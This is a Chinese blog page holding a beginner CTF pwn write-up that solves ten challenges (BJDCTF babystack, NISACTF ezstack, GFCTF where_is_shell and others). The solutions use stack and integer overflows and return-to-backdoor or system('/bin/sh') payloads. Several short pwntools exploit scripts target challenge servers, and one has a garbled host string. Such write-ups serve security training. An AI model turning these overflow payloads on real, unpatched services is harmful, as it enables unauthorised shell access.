<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 7.3.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","scheme":"Muse","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":true,"show_result":true,"style":"default"},"back2top":{"enable":true,"sidebar":false,"scrollpercent":true},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="1.[NISACTF 2022]ReorPwn? 用ida打开发现gets危险函数但是没有栈溢出，在调用system函数前，调用了fun函数 看一下fun函数没看懂搜了一下，是交换字符串的位置反转一下，输入sl没有反应，直接输入galf tac，flag出来了  2.[BJDCTF 2020]babystack2.0Checksec发现64位nx保护开启  从题目提示看是整数溢出和栈溢出 用ide">
<meta property="og:type" content="article">
<meta property="og:title" content="BUUCTF wp">
<meta property="og:url" content="http://example.com/2025/01/19/wp/index.html">
<meta property="og:site_name" content="小小pwn">
<meta property="og:description" content="1.[NISACTF 2022]ReorPwn? 用ida打开发现gets危险函数但是没有栈溢出，在调用system函数前，调用了fun函数 看一下fun函数没看懂搜了一下，是交换字符串的位置反转一下，输入sl没有反应，直接输入galf tac，flag出来了  2.[BJDCTF 2020]babystack2.0Checksec发现64位nx保护开启  从题目提示看是整数溢出和栈溢出 用ide">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://example.com/2025/01/19/wp/image-20250119144608720.png">
<meta property="og:image" content="http://example.com/2025/01/19/wp/image-20250119144645315.png">
<meta property="og:image" content="http://example.com/2025/01/19/wp/image-20250119140419683.png">
<meta property="og:image" content="http://example.com/2025/01/19/wp/image-20250119140514421.png">
<meta property="og:image" content="http://example.com/2025/01/19/wp/image-20250119140127117.png">
<meta property="og:image" content="http://example.com/2025/01/19/wp/image-20250119140737788.png">
<meta property="og:image" content="http://example.com/2025/01/19/wp/wps2.jpg">
<meta property="og:image" content="http://example.com/2025/01/19/wp/wps3.jpg">
<meta property="og:image" content="http://example.com/2025/01/19/wp/wps4.jpg">
<meta property="og:image" content="http://example.com/2025/01/19/wp/wps5.jpg">
<meta property="og:image" content="http://example.com/2025/01/19/wp/wps6.jpg">
<meta property="og:image" content="http://example.com/2025/01/19/wp/wps7.jpg">
<meta property="og:image" content="http://example.com/2025/01/19/wp/wps8.jpg">
<meta property="og:image" content="http://example.com/2025/01/19/wp/wps9.jpg">
<meta property="og:image" content="http://example.com/2025/01/19/wp/wps10.jpg">
<meta property="og:image" content="http://example.com/2025/01/19/wp/wps11.jpg">
<meta property="og:image" content="http://example.com/2025/01/19/wp/wps12.jpg">
<meta property="og:image" content="http://example.com/2025/01/19/wp/wps13.jpg">
<meta property="og:image" content="http://example.com/2025/01/19/wp/wps14.jpg">
<meta property="og:image" content="http://example.com/2025/01/19/wp/wps15.jpg">
<meta property="og:image" content="http://example.com/2025/01/19/wp/wps16.jpg">
<meta property="og:image" content="http://example.com/2025/01/19/wp/wps17.jpg">
<meta property="og:image" content="http://example.com/2025/01/19/wp/wps18.jpg">
<meta property="og:image" content="http://example.com/2025/01/19/wp/wps19.jpg">
<meta property="og:image" content="http://example.com/2025/01/19/wp/wps20.jpg">
<meta property="article:published_time" content="2025-01-19T02:55:19.000Z">
<meta property="article:modified_time" content="2025-01-25T15:07:14.302Z">
<meta property="article:author" content="和方煜">
<meta property="article:tag" content="wp">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/2025/01/19/wp/image-20250119144608720.png">

<link rel="canonical" href="http://example.com/2025/01/19/wp/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>BUUCTF wp | 小小pwn</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">小小pwn</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2025/01/19/wp/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="和方煜">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="小小pwn">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          BUUCTF wp
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2025-01-19 10:55:19" itemprop="dateCreated datePublished" datetime="2025-01-19T10:55:19+08:00">2025-01-19</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2025-01-25 23:07:14" itemprop="dateModified" datetime="2025-01-25T23:07:14+08:00">2025-01-25</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/%E7%AC%AC%E4%B8%80%E5%91%A8/" itemprop="url" rel="index"><span itemprop="name">第一周</span></a>
                </span>
            </span>

          
            <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv" style="display: none;">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">阅读次数：</span>
              <span id="busuanzi_value_page_pv"></span>
            </span><br>
            <span class="post-meta-item" title="本文字数">
              <span class="post-meta-item-icon">
                <i class="far fa-file-word"></i>
              </span>
                <span class="post-meta-item-text">本文字数：</span>
              <span>2.1k</span>
            </span>
            <span class="post-meta-item" title="阅读时长">
              <span class="post-meta-item-icon">
                <i class="far fa-clock"></i>
              </span>
                <span class="post-meta-item-text">阅读时长 &asymp;</span>
              <span>2 分钟</span>
            </span>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="1-NISACTF-2022-ReorPwn"><a href="#1-NISACTF-2022-ReorPwn" class="headerlink" title="1.[NISACTF 2022]ReorPwn?"></a>1.[NISACTF 2022]ReorPwn?</h1><p><img src="/2025/01/19/wp/image-20250119144608720.png" alt="image-20250119144608720"></p>
<p>用ida打开发现gets危险函数但是没有栈溢出，在调用system函数前，调用了fun函数</p>
<p>看一下fun函数没看懂搜了一下，是交换字符串的位置反转一下，输入sl没有反应，直接输入galf tac，flag出来了</p>
<p><img src="/2025/01/19/wp/image-20250119144645315.png" alt="image-20250119144645315"></p>
<h1 id="2-BJDCTF-2020-babystack2-0"><a href="#2-BJDCTF-2020-babystack2-0" class="headerlink" title="2.[BJDCTF 2020]babystack2.0"></a>2.[BJDCTF 2020]babystack2.0</h1><p>Checksec发现64位nx保护开启</p>
<p><img src="/2025/01/19/wp/image-20250119140419683.png" alt="image-20250119140419683"></p>
<p>从题目提示看是整数溢出和栈溢出</p>
<p>用idea打开发现后门函数backdoor（0x0400726）和危险函数read可以栈溢出（0x10），但是被if函数限制了得绕过if函数</p>
<p><img src="/2025/01/19/wp/image-20250119140514421.png" alt="image-20250119140514421"></p>
<p>搜了一下wp</p>
<p><img src="/2025/01/19/wp/image-20250119140127117.png" alt="image-20250119140127117"></p>
<p>看懂了，本来nbytes是无符号的整型（size_t），而后面转换成了有符号的整型（int）发送-1，10绕过if，且unsigned int是无符号整型，遇到-1就会变成unsigned int的最大值，使read函数能够栈溢出最后返回到后门的地址。</p>
<p>exp</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span>*</span><br><span class="line">r = remote(<span class="string">&#x27;node4.anna.nssctf.cn&#x27;</span>,<span class="number">28220</span>)</span><br><span class="line">p1 = <span class="string">b&#x27;-1&#x27;</span></span><br><span class="line">r.sendline(p1)</span><br><span class="line">p2 = <span class="string">b&#x27;a&#x27;</span>*(<span class="number">0x10</span>+<span class="number">0x8</span>)+p64(<span class="number">0x0400726</span>)</span><br><span class="line">r.sendline(p2)</span><br><span class="line">r.interactive()</span><br></pre></td></tr></table></figure>

<h1 id="3-BJDCTF-2020-babystack"><a href="#3-BJDCTF-2020-babystack" class="headerlink" title="3.[BJDCTF 2020]babystack"></a>3.[BJDCTF 2020]babystack</h1><p><img src="/2025/01/19/wp/image-20250119140737788.png" alt="image-20250119140737788"></p>
<p>这道题与上一道相似，但是少了if，更简单了，buf读入的数据长度由我们输入的nbytes来决定，这里可以栈溢出，先输入一个大于0x10字节，在进行溢出就可以。</p>
<p>Exp</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span>*</span><br><span class="line">r = remote(<span class="string">&#x27; [node4.anna.nssctf.cn’,28343](http://node4.anna.nssctf.cn:28343/)&#x27;</span>)</span><br><span class="line">p1 = <span class="string">b&#x27;100&#x27;</span></span><br><span class="line">r.sendline(p1)</span><br><span class="line">p2 = <span class="string">b&#x27;a&#x27;</span>*(<span class="number">0x10</span>+<span class="number">0x8</span>)+p64(<span class="number">0x04006E6</span>)</span><br><span class="line">r.sendline(p2)</span><br><span class="line">r.interactive()</span><br></pre></td></tr></table></figure>

<p>也可以用上面一个exp因为unsigned int是无符号整型，遇到-1就会变成unsigned int的最大值</p>
<h1 id="4-NISACTF-2022-ezstack"><a href="#4-NISACTF-2022-ezstack" class="headerlink" title="4.[NISACTF 2022]ezstack"></a>4.[NISACTF 2022]ezstack</h1><p>Checksec发现是32位的。NX保护开启</p>
<p>Ida分析发现main函数，又发现shell函数发现read可以栈溢出，shift+f12发现system与&#x2F;bin&#x2F;sh，找到system的地址，与&#x2F;bin&#x2F;sh的地址编写exp</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">p = remote(<span class="string">&#x27;node5.anna.nssctf.cn&#x27;</span>, <span class="number">22397</span>)</span><br><span class="line">sh_addr=<span class="number">0x804a024</span></span><br><span class="line">system_plt=<span class="number">0x8048390</span></span><br><span class="line">payload=<span class="string">b&#x27;a&#x27;</span>*(<span class="number">0x48</span>+<span class="number">0x4</span>)+p32(system_plt)+p32(sh_addr)+p32(sh_addr)                <span class="comment">#第一个p32(sh_addr)用于占位</span></span><br><span class="line">p.sendline(payload)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<h1 id="5-GFCTF-2021-where-is-shell"><a href="#5-GFCTF-2021-where-is-shell" class="headerlink" title="5.[GFCTF 2021]where_is_shell"></a>5.[GFCTF 2021]where_is_shell</h1><p>Checksec发现保护开启，ida查看发现危险函数read，可以栈溢出，有system函数无&#x2F;bin&#x2F;sh，不会写，看了一下wp，虽然没有&#x2F;bin&#x2F;sh字符串，但是的汇编二进制代码里的24 30可以用来表示$0，而$0指代的就是”&#x2F;bin&#x2F;sh，</p>
<p>&#x2F;bin&#x2F;sh的地址为<img src="/2025/01/19/wp/wps2.jpg" alt="img"></p>
<p><img src="/2025/01/19/wp/wps3.jpg" alt="img"> </p>
<p>pop rdi；ret地址</p>
<p><img src="/2025/01/19/wp/wps4.jpg" alt="img"> </p>
<p>还需要栈对齐需要</p>
<p><img src="/2025/01/19/wp/wps5.jpg" alt="img"> </p>
<p>Exp模板</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span>*</span><br><span class="line">p = remote（）</span><br><span class="line">payload = <span class="string">b&#x27;a&#x27;</span>*(<span class="number">0x10</span> + <span class="number">8</span>) + p64(ret_addr) + p64(pop_rdi_addr) + p64(sh_addr) + p64(sys_addr)</span><br><span class="line">p.sendline(payload)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<p><img src="/2025/01/19/wp/wps6.jpg" alt="img"> </p>
<h1 id="6-NSSCTF-2022-Spring-Recruit-R3m4ke"><a href="#6-NSSCTF-2022-Spring-Recruit-R3m4ke" class="headerlink" title="6.[NSSCTF 2022 Spring Recruit]R3m4ke?"></a>6.[NSSCTF 2022 Spring Recruit]R3m4ke?</h1><p>checksec查看<img src="/2025/01/19/wp/wps7.jpg" alt="img"></p>
<p>Ida打开，发现危险函数gets栈溢出</p>
<p>有&#x2F;bin&#x2F;sh字符串非常简单的栈溢出</p>
<p>找到system的地址栈溢出返回到system地址</p>
<p><img src="/2025/01/19/wp/wps8.jpg" alt="img"> </p>
<p>Exp</p>
<p><img src="/2025/01/19/wp/wps9.jpg" alt="img"> </p>
<h1 id="7-HNCTF-2022-Week1-easyoverflow"><a href="#7-HNCTF-2022-Week1-easyoverflow" class="headerlink" title="7.[HNCTF 2022 Week1]easyoverflow"></a>7.[HNCTF 2022 Week1]easyoverflow</h1><p>Checksec</p>
<p><img src="/2025/01/19/wp/wps10.jpg" alt="img"> </p>
<p>Ida打开发现gets危险函数，可以溢出，发现cat flag字符串可以作为返回地址</p>
<p>地址：<img src="/2025/01/19/wp/wps11.jpg" alt="img"></p>
<p>Exp</p>
<p><img src="/2025/01/19/wp/wps12.jpg" alt="img"> </p>
<h1 id="8-WUSTCTF-2020-getshell"><a href="#8-WUSTCTF-2020-getshell" class="headerlink" title="8.[WUSTCTF 2020]getshell"></a>8.[WUSTCTF 2020]getshell</h1><p>Checksec</p>
<p><img src="/2025/01/19/wp/wps13.jpg" alt="img"> </p>
<p>Ida</p>
<p>发现<img src="/2025/01/19/wp/wps14.jpg" alt="img"></p>
<p>可以栈溢出，发现&#x2F;bin&#x2F;sh字符串，地址<img src="/2025/01/19/wp/wps15.jpg" alt="img"></p>
<p>Exp</p>
<p><img src="/2025/01/19/wp/wps16.jpg" alt="img"> </p>
<h1 id="9-GDOUCTF-2023-EASY-PWN"><a href="#9-GDOUCTF-2023-EASY-PWN" class="headerlink" title="9.[GDOUCTF 2023]EASY PWN"></a>9.[GDOUCTF 2023]EASY PWN</h1><p>Ida分析发现是随机生成一个数字，猜数字</p>
<p>发现gets函数，可以栈溢出</p>
<p>Shift+f12发现后门flag.txt </p>
<p>找到地址0x0011D5 </p>
<p>直接溢出</p>
<p>Exp如下</p>
<p><img src="/2025/01/19/wp/wps17.jpg" alt="img"> </p>
<h1 id="10-others-shellcode"><a href="#10-others-shellcode" class="headerlink" title="10.others_shellcode"></a>10.others_shellcode</h1><p> checksec查看</p>
<p><img src="/2025/01/19/wp/wps18.jpg" alt="wps18"></p>
<p>Ida查看</p>
<p>没有看懂</p>
<p>Nc一下</p>
<p><img src="/2025/01/19/wp/wps19.jpg" alt="wps19"></p>
<p>直接出来了，非常神奇</p>
<p>搜了一下wp</p>
<p><img src="/2025/01/19/wp/wps20.jpg" alt="wps20"></p>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/wp/" rel="tag"># wp</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2025/01/18/ezlibc/" rel="prev" title="2024湘岚杯ezlibc">
      <i class="fa fa-chevron-left"></i> 2024湘岚杯ezlibc
    </a></div>
      <div class="post-nav-item">
    <a href="/2025/01/20/%E6%A0%88%E6%BA%A2%E5%87%BA%E5%9F%BA%E7%A1%80/" rel="next" title="栈溢出基础">
      栈溢出基础 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#1-NISACTF-2022-ReorPwn"><span class="nav-number">1.</span> <span class="nav-text">1.[NISACTF 2022]ReorPwn?</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#2-BJDCTF-2020-babystack2-0"><span class="nav-number">2.</span> <span class="nav-text">2.[BJDCTF 2020]babystack2.0</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#3-BJDCTF-2020-babystack"><span class="nav-number">3.</span> <span class="nav-text">3.[BJDCTF 2020]babystack</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#4-NISACTF-2022-ezstack"><span class="nav-number">4.</span> <span class="nav-text">4.[NISACTF 2022]ezstack</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#5-GFCTF-2021-where-is-shell"><span class="nav-number">5.</span> <span class="nav-text">5.[GFCTF 2021]where_is_shell</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#6-NSSCTF-2022-Spring-Recruit-R3m4ke"><span class="nav-number">6.</span> <span class="nav-text">6.[NSSCTF 2022 Spring Recruit]R3m4ke?</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#7-HNCTF-2022-Week1-easyoverflow"><span class="nav-number">7.</span> <span class="nav-text">7.[HNCTF 2022 Week1]easyoverflow</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#8-WUSTCTF-2020-getshell"><span class="nav-number">8.</span> <span class="nav-text">8.[WUSTCTF 2020]getshell</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#9-GDOUCTF-2023-EASY-PWN"><span class="nav-number">9.</span> <span class="nav-text">9.[GDOUCTF 2023]EASY PWN</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#10-others-shellcode"><span class="nav-number">10.</span> <span class="nav-text">10.others_shellcode</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">和方煜</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">11</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">3</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">2</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2025</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">和方煜</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-chart-area"></i>
    </span>
      <span class="post-meta-item-text">站点总字数：</span>
    <span title="站点总字数">30k</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
      <span class="post-meta-item-text">站点阅读时长 &asymp;</span>
    <span title="站点阅读时长">27 分钟</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://muse.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Muse</a> 强力驱动
  </div>




        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span class="post-meta-item" id="busuanzi_container_site_uv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item" id="busuanzi_container_site_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/muse.js"></script>


<script src="/js/next-boot.js"></script>




  




  
<script src="/js/local-search.js"></script>













  

  

</body>
</html>
